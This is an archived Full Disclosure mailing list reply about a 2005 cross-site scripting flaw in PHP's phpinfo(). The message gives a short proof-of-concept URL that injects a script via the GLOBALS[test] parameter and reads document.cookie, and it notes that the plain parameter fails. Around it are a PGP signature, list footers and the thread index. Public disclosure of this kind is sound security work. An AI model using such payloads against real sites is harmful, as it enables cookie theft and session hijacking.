Full Disclosure mailing list archives
Re: Advisory 18/2005: PHP Cross Site Scripting (XSS)XVulnerability in phpinfo()
From: <phole () hushmail com>
Date: Thu, 3 Nov 2005 07:06:10 -0800
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 great Work PoC: phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> this Don't Work: phpinfo.php?test=<script>alert(document.cookie);</script> -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkNqJ2EACgkQ3APBCuix8ZmWRACgs0IvvixY6zfmkpJ/9APUtgPLFfgA oJgOYQ4jbwGaTcJV95ZVyiAQwMXF =zYsZ -----END PGP SIGNATURE----- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Advisory 18/2005: PHP Cross Site Scripting (XSS)XVulnerability in phpinfo() phole (Nov 03)
- PoC for PHP Cross Site Scripting (XSS)XVulnerability in phpinfo() Moritz Naumann (Nov 04)
- Re: Advisory 18/2005: PHP Cross Site Scripting (XSS)XVulnerability in phpinfo() Robert Waters (Nov 04)